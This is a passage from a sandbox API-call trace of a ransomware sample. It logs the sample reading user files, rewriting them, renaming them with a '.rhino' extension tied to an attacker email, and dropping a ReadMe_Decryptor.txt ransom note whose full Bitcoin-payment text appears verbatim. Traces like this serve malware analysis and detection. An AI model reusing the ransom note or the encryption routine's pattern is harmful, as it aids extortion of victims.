hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b01f8 | out: hHeap=0x6d0000) returned 1 [0090.221] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9870 | out: hHeap=0x6d0000) returned 1 [0090.221] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b00f0 [0090.221] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0090.221] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b0048 [0090.221] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x23b0198 [0090.221] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0090.221] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.221] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0198 | out: hHeap=0x6d0000) returned 1 [0090.221] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0090.222] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x402 [0090.222] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x522, nNumberOfBytesToLockHigh=0x0) returned 1 [0090.222] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.222] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0090.244] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.245] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x402, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x402, lpOverlapped=0x0) returned 1 [0090.245] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0090.245] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.245] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0090.245] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0090.245] GetLastError () returned 0x0 [0090.245] SetLastError (dwErrCode=0x0) [0090.245] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0090.245] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x402) returned 0x23b0198 [0090.245] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0090.245] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b05a8 [0090.245] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b06b0 [0090.245] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b05a8 | out: hHeap=0x6d0000) returned 1 [0090.246] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.246] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0090.246] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0090.246] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.246] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0090.246] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0090.246] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0090.246] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.246] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0090.246] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0090.246] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df110 [0090.246] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.246] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df140 [0090.246] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0090.246] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0090.246] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0090.246] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0090.246] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0090.246] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0090.246] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0090.246] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0090.246] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0090.246] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0090.246] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0090.246] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0090.246] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0090.247] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x23b05a8 [0090.247] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0090.247] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x23b0838 [0090.247] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b05a8 | out: hHeap=0x6d0000) returned 1 [0090.247] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x23b0980 [0090.247] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0838 | out: hHeap=0x6d0000) returned 1 [0090.247] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x23b0b68 [0090.247] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0980 | out: hHeap=0x6d0000) returned 1 [0090.247] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x75ef78 [0090.247] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0b68 | out: hHeap=0x6d0000) returned 1 [0090.247] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x23b0838 [0090.247] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0090.247] WriteFile (in: hFile=0x104, lpBuffer=0x23b0838*, nNumberOfBytesToWrite=0x522, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x23b0838*, lpNumberOfBytesWritten=0x2cfa04*=0x522, lpOverlapped=0x0) returned 1 [0090.247] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0838 | out: hHeap=0x6d0000) returned 1 [0090.247] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x522, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0090.247] CloseHandle (hObject=0x104) returned 1 [0090.248] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77f4a0 [0090.248] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14e) returned 0x23b0838 [0090.248] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77f4a0 | out: hHeap=0x6d0000) returned 1 [0090.249] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0090.250] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0838 | out: hHeap=0x6d0000) returned 1 [0090.250] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b06b0 | out: hHeap=0x6d0000) returned 1 [0090.250] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0198 | out: hHeap=0x6d0000) returned 1 [0090.250] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b0048 [0090.250] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00f0 | out: hHeap=0x6d0000) returned 1 [0090.250] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b00f0 [0090.250] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x23b0198 [0090.250] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00f0 | out: hHeap=0x6d0000) returned 1 [0090.250] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.250] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0198 | out: hHeap=0x6d0000) returned 1 [0090.250] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Documents.library-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\documents.library-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0090.250] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0xe2b [0090.250] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xf4b, nNumberOfBytesToLockHigh=0x0) returned 1 [0090.251] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.251] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0090.252] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.252] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0xe2b, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0xe2b, lpOverlapped=0x0) returned 1 [0090.252] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0090.252] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.252] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0090.252] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0090.252] GetLastError () returned 0x0 [0090.253] SetLastError (dwErrCode=0x0) [0090.253] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0090.253] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe2b) returned 0x23b00f0 [0090.253] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0090.253] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x75ef78 [0090.253] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x75f080 [0090.253] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0090.253] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.253] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0090.253] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0090.253] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.253] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0090.253] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0090.253] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0090.253] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.253] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0090.253] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0090.253] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df140 [0090.253] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.253] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df110 [0090.253] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0090.253] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0090.253] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0090.253] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0090.253] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0090.254] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0090.254] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0090.254] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0090.254] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0090.254] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0090.254] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0090.254] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0090.254] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0090.254] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x75ef78 [0090.254] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0090.254] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x75f208 [0090.254] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0090.254] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x75f350 [0090.254] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f208 | out: hHeap=0x6d0000) returned 1 [0090.254] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x75f538 [0090.254] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f350 | out: hHeap=0x6d0000) returned 1 [0090.254] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x75f808 [0090.254] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f538 | out: hHeap=0x6d0000) returned 1 [0090.254] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x75fc40 [0090.254] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f808 | out: hHeap=0x6d0000) returned 1 [0090.254] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x75f208 [0090.254] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75fc40 | out: hHeap=0x6d0000) returned 1 [0090.254] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x75fb70 [0090.254] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f208 | out: hHeap=0x6d0000) returned 1 [0090.254] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x760988 [0090.254] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75fb70 | out: hHeap=0x6d0000) returned 1 [0090.254] WriteFile (in: hFile=0x104, lpBuffer=0x7609a0*, nNumberOfBytesToWrite=0xf4b, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x7609a0*, lpNumberOfBytesWritten=0x2cfa04*=0xf4b, lpOverlapped=0x0) returned 1 [0090.255] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x760988 | out: hHeap=0x6d0000) returned 1 [0090.255] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xf4b, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0090.255] CloseHandle (hObject=0x104) returned 1 [0090.256] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x75ef78 [0090.256] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x75f208 [0090.256] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0090.256] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Documents.library-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\documents.library-ms"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Documents.library-ms.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\documents.library-ms.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0090.258] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f208 | out: hHeap=0x6d0000) returned 1 [0090.258] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f080 | out: hHeap=0x6d0000) returned 1 [0090.258] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00f0 | out: hHeap=0x6d0000) returned 1 [0090.258] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b00f0 [0090.258] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0090.258] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b0048 [0090.258] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x23b0198 [0090.258] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0090.258] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0090.260] lstrlenA (lpString="All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail:\n1)generalchin@countermail.com\n2)generalchin@smime.ninja (if you do not receive a response from the first mailbox)\n\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us.\nAfter payment we will send you the decryption tool that will decrypt all your files.\n\nFree decryption as guarantee\nBefore paying you can send us up to 1 files for free decryption.\nThe total size of files must be less than 500 Kb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\n") returned 676 [0090.260] WriteFile (in: hFile=0x104, lpBuffer=0xcb9dd0*, nNumberOfBytesToWrite=0x2a4, lpNumberOfBytesWritten=0x2cfa5c, lpOverlapped=0x0 | out: lpBuffer=0xcb9dd0*, lpNumberOfBytesWritten=0x2cfa5c*=0x2a4, lpOverlapped=0x0) returned 1 [0090.261] CloseHandle (hObject=0x104) returned 1 [0090.262] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0198 | out: hHeap=0x6d0000) returned 1 [0090.262] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Music.library-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\music.library-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0090.262] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0xe00 [0090.262] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xf20, nNumberOfBytesToLockHigh=0x0) returned 1 [0090.262] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.262] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0090.263] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.264] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0xe00, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0xe00, lpOverlapped=0x0) returned 1 [0090.264] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0090.264] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.264] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0090.264] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0090.264] GetLastError () returned 0x0 [0090.264] SetLastError (dwErrCode=0x0) [0090.264] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0090.264] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe00) returned 0x23b0198 [0090.264] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0090.264] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x75ef78 [0090.264] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x75f080 [0090.264] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0090.264] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.265] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0090.265] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0090.265] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.265] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0090.265] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0090.265] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0090.265] 